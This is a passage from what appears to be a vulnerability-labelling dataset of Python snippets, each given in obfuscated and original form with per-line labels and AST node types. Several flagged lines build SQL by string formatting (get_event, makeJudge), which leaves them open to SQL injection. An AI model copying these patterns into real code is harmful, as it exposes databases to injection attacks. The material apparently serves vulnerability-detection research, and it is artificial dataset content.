"print('serial settings:', self.serial_settings)\n",
"super().__init__(**self.serial_settings)\n",
"def FUNC_0(self, VAR_2=None, VAR_3=60):...\n",
"\"\"\"docstring\"\"\"\n",
"if VAR_2 is None:\n",
"VAR_2 = self.sensors\n",
"if self.debug:\n",
"print('sensors:', VAR_2)\n",
"while not self.is_open:\n",
"self.flush()\n",
"self.open()\n",
"time.sleep(VAR_3)\n",
"for sen in VAR_2:\n",
"self.flushInput()\n",
"yield 'NULL'\n",
"VAR_4 = self.cmd.replace('{sensor}', sen)\n",
"VAR_4 = bytes(VAR_4, 'utf8')\n",
"if self.debug:\n",
"print('serial cmd:', VAR_4)\n",
"self.write(VAR_4)\n",
"if 'ack' in self.settings and 'enq' in self.settings:\n",
"VAR_6 = codecs.decode(self.settings['ack'], 'unicode-escape')\n",
"VAR_5 = self.readline()\n",
"VAR_5 = self.readline()\n",
"if self.debug:\n",
"if self.debug:\n",
"print(VAR_5)\n",
"VAR_5 = VAR_5.strip().decode('utf-8')\n",
"print('acknowledgement:', VAR_5, bytes(VAR_6, 'utf8'))\n",
"if VAR_5 == bytes(VAR_6, 'utf8'):\n",
"if self.regex is not None:\n",
"VAR_8 = codecs.decode(self.settings['enq'], 'unicode-escape')\n",
"VAR_7 = re.search(self.regex, VAR_5)\n",
"yield VAR_5\n",
"self.write(bytes(VAR_8, 'utf8'))\n",
"VAR_5 = VAR_7.group(1)\n"
] | [
"\"\"\"\nCreated on Mon Jan 1 21:38:13 2018\n\n@author: Adam\n\"\"\"\n",
"import codecs\n",
"import re\n",
"import time\n",
"import warnings\n",
"from serial import SerialException, Serial\n",
"from .tools import get_serial_settings\n",
"from .base import Device\n",
"\"\"\" communication with a serial device \"\"\"\n",
"def __init__(self, settings, debug=False):...\n",
"self.settings = settings\n",
"self.serial_settings = get_serial_settings(settings)\n",
"self.sensors = settings.get('sensors', None)\n",
"self.cmd = codecs.decode(self.settings['cmd'], 'unicode-escape')\n",
"self.regex = settings.get('regex', None)\n",
"self.debug = debug\n",
"if self.debug:\n",
"print('serial settings:', self.serial_settings)\n",
"super().__init__(**self.serial_settings)\n",
"def read_data(self, sensors=None, reset_wait=60):...\n",
"\"\"\"docstring\"\"\"\n",
"if sensors is None:\n",
"sensors = self.sensors\n",
"if self.debug:\n",
"print('sensors:', sensors)\n",
"while not self.is_open:\n",
"self.flush()\n",
"self.open()\n",
"time.sleep(reset_wait)\n",
"for sen in sensors:\n",
"self.flushInput()\n",
"yield 'NULL'\n",
"serial_cmd = self.cmd.replace('{sensor}', sen)\n",
"serial_cmd = bytes(serial_cmd, 'utf8')\n",
"if self.debug:\n",
"print('serial cmd:', serial_cmd)\n",
"self.write(serial_cmd)\n",
"if 'ack' in self.settings and 'enq' in self.settings:\n",
"ack = codecs.decode(self.settings['ack'], 'unicode-escape')\n",
"response = self.readline()\n",
"response = self.readline()\n",
"if self.debug:\n",
"if self.debug:\n",
"print(response)\n",
"response = response.strip().decode('utf-8')\n",
"print('acknowledgement:', response, bytes(ack, 'utf8'))\n",
"if response == bytes(ack, 'utf8'):\n",
"if self.regex is not None:\n",
"enq = codecs.decode(self.settings['enq'], 'unicode-escape')\n",
"match = re.search(self.regex, response)\n",
"yield response\n",
"self.write(bytes(enq, 'utf8'))\n",
"response = match.group(1)\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
4,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"Expr'",
"Import'",
"Import'",
"Import'",
"Import'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"Expr'",
"FunctionDef'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"Expr'",
"Expr'",
"FunctionDef'",
"Docstring",
"Condition",
"Assign'",
"Condition",
"Expr'",
"Condition",
"Expr'",
"Expr'",
"Expr'",
"For",
"Expr'",
"Expr'",
"Assign'",
"Assign'",
"Condition",
"Expr'",
"Expr'",
"Condition",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"Condition",
"Expr'",
"Assign'",
"Expr'",
"Condition",
"Condition",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Assign'"
] |
[
"def FUNC_3(self, VAR_8):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_19 = self._cliq_get_cluster_info(VAR_8)\n",
"VAR_20 = []\n",
"for vip in VAR_19.findall('response/cluster/vip'):\n",
"VAR_20.append(vip.attrib.get('ipAddress'))\n",
"if len(VAR_20) == 1:\n",
"return VAR_20[0]\n",
"VAR_21 = etree.tostring(VAR_19)\n",
"VAR_22 = _(\n 'Unexpected number of virtual ips for cluster %(cluster_name)s. Result=%(_xml)s'\n ) % {'cluster_name': VAR_8, '_xml': VAR_21}\n"
] | [
"def _cliq_get_cluster_vip(self, cluster_name):...\n",
"\"\"\"docstring\"\"\"\n",
"cluster_xml = self._cliq_get_cluster_info(cluster_name)\n",
"vips = []\n",
"for vip in cluster_xml.findall('response/cluster/vip'):\n",
"vips.append(vip.attrib.get('ipAddress'))\n",
"if len(vips) == 1:\n",
"return vips[0]\n",
"_xml = etree.tostring(cluster_xml)\n",
"msg = _(\n 'Unexpected number of virtual ips for cluster %(cluster_name)s. Result=%(_xml)s'\n ) % {'cluster_name': cluster_name, '_xml': _xml}\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"Assign'",
"For",
"Expr'",
"Condition",
"Return'",
"Assign'",
"Assign'"
] |
[
"def FUNC_39(self, VAR_20):...\n",
"for VAR_14 in self.list_properties.keys():\n",
"if self.is_relation(VAR_14):\n",
"if VAR_20 == self.get_related_model(VAR_14):\n",
"return VAR_14\n"
] | [
"def get_related_fk(self, model):...\n",
"for col_name in self.list_properties.keys():\n",
"if self.is_relation(col_name):\n",
"if model == self.get_related_model(col_name):\n",
"return col_name\n"
] | [
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"For",
"Condition",
"Condition",
"Return'"
] |
[
"def FUNC_11(self, VAR_9):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_8 = VAR_9.args.get('csessid')[0]\n",
"VAR_20 = self.sessionhandler.sessions_from_csessid(VAR_8)[0]\n",
"self.client_disconnect(VAR_8)\n",
"return '\"\"'\n",
"VAR_20.sessionhandler.disconnect(VAR_20)\n"
] | [
"def mode_close(self, request):...\n",
"\"\"\"docstring\"\"\"\n",
"csessid = request.args.get('csessid')[0]\n",
"sess = self.sessionhandler.sessions_from_csessid(csessid)[0]\n",
"self.client_disconnect(csessid)\n",
"return '\"\"'\n",
"sess.sessionhandler.disconnect(sess)\n"
] | [
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"Assign'",
"Expr'",
"Return'",
"Expr'"
] |
[
"def FUNC_50(self):...\n",
"self.compilation_ko('true;')\n"
] | [
"def test_test_outside_control(self):...\n",
"self.compilation_ko('true;')\n"
] | [
0,
0
] | [
"FunctionDef'",
"Expr'"
] |
[
"def FUNC_0(VAR_0):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_3 = []\n",
"for i in range(VAR_0):\n",
"VAR_9 = mock.MagicMock(VAR_8='AndroidDevice', VAR_4=str(i), h_port=None)\n",
"return VAR_3\n",
"VAR_3.append(VAR_9)\n"
] | [
"def get_mock_ads(num):...\n",
"\"\"\"docstring\"\"\"\n",
"ads = []\n",
"for i in range(num):\n",
"ad = mock.MagicMock(name='AndroidDevice', serial=str(i), h_port=None)\n",
"return ads\n",
"ads.append(ad)\n"
] | [
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"For",
"Assign'",
"Return'",
"Expr'"
] |
[
"def FUNC_18(VAR_25):...\n",
"VAR_22[VAR_25] = VAR_20\n",
"VAR_23[VAR_25] = VAR_20\n",
"VAR_20 += 1\n",
"VAR_21.append(VAR_25)\n",
"VAR_24[VAR_25] = True\n",
"for VAR_34 in self.successors[VAR_25]:\n",
"if VAR_22[VAR_34] == None:\n",
"VAR_46 = set()\n",
"FUNC_18(VAR_34)\n",
"if VAR_24[VAR_34]:\n",
"if VAR_23[VAR_25] == VAR_22[VAR_25]:\n",
"VAR_23[VAR_25] = min(VAR_23[VAR_25], VAR_23[VAR_34])\n",
"VAR_23[VAR_25] = min(VAR_23[VAR_25], VAR_22[VAR_34])\n",
"while True:\n",
"return VAR_46\n",
"VAR_34 = VAR_21.pop()\n",
"VAR_24[VAR_34] = False\n",
"VAR_46.add(VAR_34)\n",
"if VAR_25 == VAR_34:\n"
] | [
"def strong_connect(v):...\n",
"indices[v] = index\n",
"lowlink[v] = index\n",
"index += 1\n",
"S.append(v)\n",
"onstack[v] = True\n",
"for w in self.successors[v]:\n",
"if indices[w] == None:\n",
"component = set()\n",
"strong_connect(w)\n",
"if onstack[w]:\n",
"if lowlink[v] == indices[v]:\n",
"lowlink[v] = min(lowlink[v], lowlink[w])\n",
"lowlink[v] = min(lowlink[v], indices[w])\n",
"while True:\n",
"return component\n",
"w = S.pop()\n",
"onstack[w] = False\n",
"component.add(w)\n",
"if v == w:\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"AugAssign'",
"Expr'",
"Assign'",
"For",
"Condition",
"Assign'",
"Expr'",
"Condition",
"Condition",
"Assign'",
"Assign'",
"Condition",
"Return'",
"Assign'",
"Assign'",
"Expr'",
"Condition"
] |
[
"def FUNC_32(self, VAR_81):...\n",
"def FUNC_39(VAR_101):...\n",
"VAR_101.shellcmd = VAR_81\n",
"return VAR_101\n"
] | [
"def shellcmd(self, cmd):...\n",
"def decorate(ruleinfo):...\n",
"ruleinfo.shellcmd = cmd\n",
"return ruleinfo\n"
] | [
0,
0,
0,
0
] | [
"FunctionDef'",
"FunctionDef'",
"Assign'",
"Return'"
] |
[
"def FUNC_13(self, VAR_9, VAR_10=None, VAR_11=None, VAR_20=''):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_28 = self.get_and_check_task(VAR_9, VAR_10, VAR_11)\n",
"VAR_31 = {'all': 'all.zip', 'geotiff': os.path.join('odm_orthophoto',\n 'odm_orthophoto.tif'), 'las': os.path.join('odm_georeferencing',\n 'odm_georeferenced_model.ply.las'), 'ply': os.path.join(\n 'odm_georeferencing', 'odm_georeferenced_model.ply'), 'csv': os.path.\n join('odm_georeferencing', 'odm_georeferenced_model.csv')}\n",
"if VAR_20 in VAR_31:\n",
"VAR_33 = VAR_28.assets_path(VAR_31[VAR_20])\n",
"if not os.path.exists(VAR_33):\n",
"VAR_34 = os.path.basename(VAR_33)\n",
"VAR_35 = open(VAR_33, 'rb')\n",
"VAR_36 = HttpResponse(FileWrapper(VAR_35), content_type=mimetypes.\n guess_type(asset_filename)[0] or 'application/zip')\n",
"VAR_36['Content-Disposition'] = 'attachment; filename={}'.format(VAR_34)\n",
"return VAR_36\n"
] | [
"def get(self, request, pk=None, project_pk=None, asset=''):...\n",
"\"\"\"docstring\"\"\"\n",
"task = self.get_and_check_task(request, pk, project_pk)\n",
"allowed_assets = {'all': 'all.zip', 'geotiff': os.path.join(\n 'odm_orthophoto', 'odm_orthophoto.tif'), 'las': os.path.join(\n 'odm_georeferencing', 'odm_georeferenced_model.ply.las'), 'ply': os.\n path.join('odm_georeferencing', 'odm_georeferenced_model.ply'), 'csv':\n os.path.join('odm_georeferencing', 'odm_georeferenced_model.csv')}\n",
"if asset in allowed_assets:\n",
"asset_path = task.assets_path(allowed_assets[asset])\n",
"if not os.path.exists(asset_path):\n",
"asset_filename = os.path.basename(asset_path)\n",
"file = open(asset_path, 'rb')\n",
"response = HttpResponse(FileWrapper(file), content_type=mimetypes.\n guess_type(asset_filename)[0] or 'application/zip')\n",
"response['Content-Disposition'] = 'attachment; filename={}'.format(\n asset_filename)\n",
"return response\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Condition",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Return'"
] |
[
"def FUNC_5(self, VAR_12):...\n",
"VAR_14 = 'string'.format(VAR_12)\n",
"self.cur.execute(VAR_14)\n",
"return self.cur.fetchall()\n"
] | [
"def get_event(self, event_id):...\n",
"sql = (\n \"\"\"SELECT title, description, start_time, time_zone, (\n SELECT GROUP_CONCAT(DISTINCT username)\n FROM user_event\n WHERE event_id = {0}\n AND user_event.attending = 1)\n AS accepted, (\n SELECT GROUP_CONCAT(DISTINCT username)\n FROM user_event\n WHERE event_id = {0}\n AND user_event.attending = 0)\n AS declined\n FROM events\n WHERE event_id = {0};\n \"\"\"\n .format(event_id))\n",
"self.cur.execute(sql)\n",
"return self.cur.fetchall()\n"
] | [
0,
4,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Expr'",
"Return'"
] |
[
"def FUNC_23(self, *VAR_69, **VAR_70):...\n",
"def FUNC_39(VAR_101):...\n",
"VAR_101.output = VAR_69, VAR_70\n",
"return VAR_101\n"
] | [
"def output(self, *paths, **kwpaths):...\n",
"def decorate(ruleinfo):...\n",
"ruleinfo.output = paths, kwpaths\n",
"return ruleinfo\n"
] | [
0,
0,
0,
0
] | [
"FunctionDef'",
"FunctionDef'",
"Assign'",
"Return'"
] |
[
"def __init__(self, VAR_1=None, VAR_2=None, VAR_3=None, VAR_4=None, VAR_5=...\n",
"\"\"\"docstring\"\"\"\n",
"self._rules = OrderedDict()\n",
"self.first_rule = None\n",
"self._workdir = None\n",
"self.overwrite_workdir = VAR_6\n",
"self.workdir_init = os.path.abspath(os.curdir)\n",
"self._ruleorder = Ruleorder()\n",
"self._localrules = set()\n",
"self.linemaps = dict()\n",
"self.rule_count = 0\n",
"self.basedir = os.path.dirname(VAR_1)\n",
"self.snakefile = os.path.abspath(VAR_1)\n",
"self.snakemakepath = VAR_2\n",
"self.included = []\n",
"self.included_stack = []\n",
"self.jobscript = VAR_3\n",
"self.persistence = None\n",
"self.global_resources = None\n",
"self.globals = globals()\n",
"self._subworkflows = dict()\n",
"self.overwrite_shellcmd = VAR_4\n",
"self.overwrite_config = VAR_5\n",
"self.overwrite_configfile = VAR_7\n",
"self.config_args = VAR_8\n",
"self._onsuccess = lambda log: None\n",
"self._onerror = lambda log: None\n",
"self.debug = VAR_9\n",
"VAR_85 = dict()\n",
"VAR_85.update(self.overwrite_config)\n",
"VAR_86 = CLASS_3()\n"
] | [
"def __init__(self, snakefile=None, snakemakepath=None, jobscript=None,...\n",
"\"\"\"docstring\"\"\"\n",
"self._rules = OrderedDict()\n",
"self.first_rule = None\n",
"self._workdir = None\n",
"self.overwrite_workdir = overwrite_workdir\n",
"self.workdir_init = os.path.abspath(os.curdir)\n",
"self._ruleorder = Ruleorder()\n",
"self._localrules = set()\n",
"self.linemaps = dict()\n",
"self.rule_count = 0\n",
"self.basedir = os.path.dirname(snakefile)\n",
"self.snakefile = os.path.abspath(snakefile)\n",
"self.snakemakepath = snakemakepath\n",
"self.included = []\n",
"self.included_stack = []\n",
"self.jobscript = jobscript\n",
"self.persistence = None\n",
"self.global_resources = None\n",
"self.globals = globals()\n",
"self._subworkflows = dict()\n",
"self.overwrite_shellcmd = overwrite_shellcmd\n",
"self.overwrite_config = overwrite_config\n",
"self.overwrite_configfile = overwrite_configfile\n",
"self.config_args = config_args\n",
"self._onsuccess = lambda log: None\n",
"self._onerror = lambda log: None\n",
"self.debug = debug\n",
"config = dict()\n",
"config.update(self.overwrite_config)\n",
"rules = Rules()\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"Condition",
"Docstring",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Assign'"
] |
[
"def FUNC_6(self):...\n",
"if not (VAR_101.default_sr or VAR_101.user_is_loggedin and VAR_101.site.\n",
"return False\n",
"return True\n"
] | [
"def run(self):...\n",
"if not (c.default_sr or c.user_is_loggedin and c.site.can_submit(c.user)):\n",
"return False\n",
"return True\n"
] | [
0,
0,
0,
0
] | [
"FunctionDef'",
"Condition",
"Return'",
"Return'"
] |
[
"def __eq__(self, VAR_25):...\n",
"VAR_0 = VAR_25._file if isinstance(VAR_25, CLASS_0) else VAR_25\n",
"return self._file == VAR_0\n"
] | [
"def __eq__(self, other):...\n",
"f = other._file if isinstance(other, _IOFile) else other\n",
"return self._file == f\n"
] | [
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Return'"
] |
[
"def FUNC_12(VAR_10, VAR_8):...\n",
"if not VAR_8 in VAR_10:\n",
"return None\n",
"return VAR_10[VAR_8]\n"
] | [
"def get_safe_val(src, name):...\n",
"if not name in src:\n",
"return None\n",
"return src[name]\n"
] | [
0,
0,
0,
0
] | [
"FunctionDef'",
"Condition",
"Return'",
"Return'"
] |
[
"\"\"\"string\"\"\"\n",
"import sys\n",
"import citest.aws_testing as aws\n",
"import citest.json_contract as jc\n",
"import citest.service_testing as st\n",
"import spinnaker_testing as sk\n",
"import spinnaker_testing.kato as kato\n",
"\"\"\"string\"\"\"\n",
"VAR_0 = ''\n",
"@classmethod...\n",
"\"\"\"docstring\"\"\"\n",
"return kato.new_agent(VAR_2)\n"
] | [
"\"\"\"\nTests to see if CloudDriver/Kato can interoperate with Amazon Web Services.\n\nSample Usage:\n Assuming you have created $PASSPHRASE_FILE (which you should chmod 400):\n and $CITEST_ROOT points to the root directory of this repository\n (which is . if you execute this from the root)\n and $AWS_PROFILE is the name of the aws_cli profile for authenticating\n to observe aws resources:\n\n This first command would be used if Spinnaker itself was deployed on GCE.\n The test needs to talk to GCE to get to spinnaker (using the gce_* params)\n then talk to AWS (using the aws_profile with the aws cli program) to\n verify Spinnaker had the right effects on AWS.\n\n PYTHONPATH=$CITEST_ROOT:$CITEST_ROOT/spinnaker python $CITEST_ROOT/spinnaker/spinnaker_system/aws_kato_test.py --gce_ssh_passphrase_file=$PASSPHRASE_FILE --gce_project=$PROJECT --gce_zone=$GCE_ZONE --gce_instance=$INSTANCE --test_aws_zone=$AWS_ZONE --aws_profile=$AWS_PROFILE\n\n or\n\n This second command would be used if Spinnaker itself was deployed some\n place reachable through a direct IP connection. It could be, but is not\n necessarily deployed on GCE. It is similar to above except it does not\n need to go through GCE and its firewalls to locate the actual IP endpoints\n rather those are already known and accessible.\n\n PYTHONPATH=$CITEST_ROOT:$CITEST_ROOT/spinnaker python $CITEST_ROOT/spinnaker/spinnaker_system/aws_kato_test.py --native_hostname=host-running-kato\n --test_aws_zone=$AWS_ZONE --aws_profile=$AWS_PROFILE\n\n Note that the $AWS_ZONE is not directly used, rather it is a standard\n parameter being used to infer the region. The test is going to pick\n some different availability zones within the region in order to test kato.\n These are currently hardcoded in.\n\"\"\"\n",
"import sys\n",
"import citest.aws_testing as aws\n",
"import citest.json_contract as jc\n",
"import citest.service_testing as st\n",
"import spinnaker_testing as sk\n",
"import spinnaker_testing.kato as kato\n",
"\"\"\"Defines the scenario for the test.\n\n This scenario defines the different test operations.\n We're going to:\n Create a Load Balancer\n Delete a Load Balancer\n \"\"\"\n",
"__use_lb_name = ''\n",
"@classmethod...\n",
"\"\"\"docstring\"\"\"\n",
"return kato.new_agent(bindings)\n"
] | [
0,
0,
0,
1,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"Expr'",
"Import'",
"Import'",
"Import'",
"Import'",
"Import'",
"Import'",
"Expr'",
"Assign'",
"Condition",
"Docstring",
"Return'"
] |
[
"def __init__(self, VAR_10, VAR_11=None):...\n",
"if VAR_11 is None:\n",
"VAR_11 = 'http://localhost:8888/'\n",
"self.browser = VAR_10\n",
"self.base_url = VAR_11\n",
"self.outcome = None\n",
"self.start_time = None\n",
"self.stop_time = None\n",
"self.duration = None\n",
"self.exception_data = None\n",
"self.url = None\n",
"self.data = None\n",
"self.files = None\n",
"self.status_code = None\n",
"self.response = None\n",
"self.res_data = None\n",
"self.redirected_to = None\n"
] | [
"def __init__(self, browser, base_url=None):...\n",
"if base_url is None:\n",
"base_url = 'http://localhost:8888/'\n",
"self.browser = browser\n",
"self.base_url = base_url\n",
"self.outcome = None\n",
"self.start_time = None\n",
"self.stop_time = None\n",
"self.duration = None\n",
"self.exception_data = None\n",
"self.url = None\n",
"self.data = None\n",
"self.files = None\n",
"self.status_code = None\n",
"self.response = None\n",
"self.res_data = None\n",
"self.redirected_to = None\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Condition",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'"
] |
[
"def FUNC_7(self):...\n",
"\"\"\"docstring\"\"\"\n",
"self.update()\n",
"return self.data.keys()\n"
] | [
"def get_module_names(self):...\n",
"\"\"\"docstring\"\"\"\n",
"self.update()\n",
"return self.data.keys()\n"
] | [
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Expr'",
"Return'"
] |
[
"def FUNC_6(self, VAR_44, VAR_50):...\n",
"if not FUNC_2(VAR_44):\n",
"return self.error()\n",
"if VAR_50 != VAR_44:\n",
"return self.error(errors.BAD_PASSWORD_MATCH)\n",
"return VAR_44\n"
] | [
"def run(self, password, verify):...\n",
"if not chkpass(password):\n",
"return self.error()\n",
"if verify != password:\n",
"return self.error(errors.BAD_PASSWORD_MATCH)\n",
"return password\n"
] | [
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Condition",
"Return'",
"Condition",
"Return'",
"Return'"
] |
[
"def FUNC_12(self, VAR_7, VAR_8):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_12 = self.tid_tag_count(VAR_7)\n",
"VAR_13 = [VAR_3 for VAR_3 in VAR_7 if VAR_12[VAR_3] >= VAR_8]\n",
"return VAR_13\n"
] | [
"def filter_tags(self, tids, min_tags):...\n",
"\"\"\"docstring\"\"\"\n",
"count_dict = self.tid_tag_count(tids)\n",
"tids_filtered = [tid for tid in tids if count_dict[tid] >= min_tags]\n",
"return tids_filtered\n"
] | [
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"Assign'",
"Return'"
] |
[
"import psycopg2\n",
"VAR_0 = 'forum'\n",
"def FUNC_0():...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_2 = psycopg2.connect(database=DBNAME)\n",
"VAR_3 = VAR_2.cursor()\n",
"VAR_3.execute('select content,time from posts order by time desc')\n",
"return VAR_3.fetchall()\n"
] | [
"import psycopg2\n",
"DBNAME = 'forum'\n",
"def get_posts():...\n",
"\"\"\"docstring\"\"\"\n",
"db = psycopg2.connect(database=DBNAME)\n",
"c = db.cursor()\n",
"c.execute('select content,time from posts order by time desc')\n",
"return c.fetchall()\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0
] | [
"Import'",
"Assign'",
"FunctionDef'",
"Docstring",
"Assign'",
"Assign'",
"Expr'",
"Return'"
] |
[
"def FUNC_0(self):...\n",
"self.reg = self.eng.allocate_qureg(self.wires)\n"
] | [
"def reset(self):...\n",
"self.reg = self.eng.allocate_qureg(self.wires)\n"
] | [
0,
0
] | [
"FunctionDef'",
"Assign'"
] |
[
"def FUNC_3(VAR_3):...\n",
"return re.split('\\\\s*<br */>\\\\s*', VAR_3, flags=re.IGNORECASE)\n"
] | [
"def split_br(text):...\n",
"return re.split('\\\\s*<br */>\\\\s*', text, flags=re.IGNORECASE)\n"
] | [
0,
0
] | [
"FunctionDef'",
"Return'"
] |
[
"def FUNC_3(VAR_11):...\n",
"VAR_3.execute(\n \"UPDATE players SET Judge = 1 WHERE Name = '%s' COLLATE NOCASE\" % VAR_11)\n",
"VAR_2.commit()\n"
] | [
"def makeJudge(judge):...\n",
"db.execute(\"UPDATE players SET Judge = 1 WHERE Name = '%s' COLLATE NOCASE\" %\n judge)\n",
"database.commit()\n"
] | [
0,
4,
0
] | [
"FunctionDef'",
"Expr'",
"Expr'"
] |
[
"def FUNC_0(self, VAR_11):...\n",
""
] | [
"def add_tag_by_name(self, tagname):...\n",
""
] | [
0,
0
] | [
"FunctionDef'",
"Condition"
] |
[
"@utils.synchronized('3par', external=True)...\n",
"self.common.client_login()\n",
"VAR_19 = self.common.create_cloned_volume(VAR_6, VAR_7)\n",
"self.common.client_logout()\n",
"return {'metadata': VAR_19}\n"
] | [
"@utils.synchronized('3par', external=True)...\n",
"self.common.client_login()\n",
"new_vol = self.common.create_cloned_volume(volume, src_vref)\n",
"self.common.client_logout()\n",
"return {'metadata': new_vol}\n"
] | [
0,
0,
0,
0,
0
] | [
"Condition",
"Expr'",
"Assign'",
"Expr'",
"Return'"
] |
[
"def FUNC_8(self, VAR_15):...\n",
"VAR_32 = 1.0\n",
"VAR_33 = 'GB'\n",
"if VAR_15.endswith('MB'):\n",
"VAR_32 = 1.0 / 1024\n",
"if VAR_15.endswith('TB'):\n",
"VAR_33 = 'MB'\n",
"VAR_32 = 1.0 * 1024\n",
"return VAR_32 * float(VAR_15.partition(VAR_33)[0])\n",
"VAR_33 = 'TB'\n"
] | [
"def _get_space_in_gb(self, val):...\n",
"scale = 1.0\n",
"part = 'GB'\n",
"if val.endswith('MB'):\n",
"scale = 1.0 / 1024\n",
"if val.endswith('TB'):\n",
"part = 'MB'\n",
"scale = 1.0 * 1024\n",
"return scale * float(val.partition(part)[0])\n",
"part = 'TB'\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Condition",
"Assign'",
"Assign'",
"Return'",
"Assign'"
] |
[
"@tornado.web.asynchronous...\n",
""
] | [
"@tornado.web.asynchronous...\n",
""
] | [
0,
0
] | [
"Condition",
"Condition"
] |
[
"def FUNC_4(self):...\n",
"self.driver._eql_execute = self.mox.CreateMock(self.driver._eql_execute)\n",
"VAR_1 = {'name': self.volume_name, 'size': 1, 'id': self.volid}\n",
"self.driver._eql_execute('volume', 'select', VAR_1['name'], 'show').AndRaise(\n processutils.ProcessExecutionError(stdout=\n \"\"\"% Error ..... does not exist.\n\"\"\"))\n",
"self.mox.ReplayAll()\n",
"self.driver.delete_volume(VAR_1)\n"
] | [
"def test_delete_absent_volume(self):...\n",
"self.driver._eql_execute = self.mox.CreateMock(self.driver._eql_execute)\n",
"volume = {'name': self.volume_name, 'size': 1, 'id': self.volid}\n",
"self.driver._eql_execute('volume', 'select', volume['name'], 'show').AndRaise(\n processutils.ProcessExecutionError(stdout=\n \"\"\"% Error ..... does not exist.\n\"\"\"))\n",
"self.mox.ReplayAll()\n",
"self.driver.delete_volume(volume)\n"
] | [
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Expr'"
] |
[
"def FUNC_0(self, VAR_0):...\n",
"VAR_3 = VAR_0.cookies.get('XSRF-TOKEN')\n",
"if VAR_3:\n",
"self.xsrf_token = VAR_3\n"
] | [
"def _store_xsrf_token(self, response):...\n",
"xsrf_token = response.cookies.get('XSRF-TOKEN')\n",
"if xsrf_token:\n",
"self.xsrf_token = xsrf_token\n"
] | [
0,
5,
5,
5
] | [
"FunctionDef'",
"Assign'",
"Condition",
"Assign'"
] |
[
"import sqlite3\n",
"import os.path\n",
"from cpwrap import CFG\n",
"import random\n",
"import string\n",
"def FUNC_0():...\n",
"VAR_0 = sqlite3.connect(CFG('dbname'))\n",
"return VAR_0, VAR_0.cursor()\n"
] | [
"import sqlite3\n",
"import os.path\n",
"from cpwrap import CFG\n",
"import random\n",
"import string\n",
"def connectDB():...\n",
"conn = sqlite3.connect(CFG('dbname'))\n",
"return conn, conn.cursor()\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0
] | [
"Import'",
"Import'",
"ImportFrom'",
"Import'",
"Import'",
"FunctionDef'",
"Assign'",
"Return'"
] |
[
"def FUNC_0():...\n",
"\"\"\"docstring\"\"\"\n",
"return VAR_3\n"
] | [
"def getDjangoURLPatterns():...\n",
"\"\"\"docstring\"\"\"\n",
"return ROLE_MODELS_URL_PATTERNS\n"
] | [
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Return'"
] |
[
"def FUNC_2(self, VAR_4):...\n",
"VAR_10 = VAR_4.find_all('p', not {'class': 'mw-empty-elt'}, recursive=False,\n limit=self.MAX_P_CHECKS)\n",
"for p in VAR_10:\n",
"VAR_7 = self.parse_tag(p)\n",
"VAR_11 = VAR_4.find('ul', recursive=False)\n",
"if VAR_7:\n",
"VAR_7 = self.parse_tag(VAR_11)\n",
"return VAR_7\n",
"return VAR_7\n"
] | [
"def parse_html(self, div):...\n",
"p_tags = div.find_all('p', not {'class': 'mw-empty-elt'}, recursive=False,\n limit=self.MAX_P_CHECKS)\n",
"for p in p_tags:\n",
"next_wiki = self.parse_tag(p)\n",
"ul = div.find('ul', recursive=False)\n",
"if next_wiki:\n",
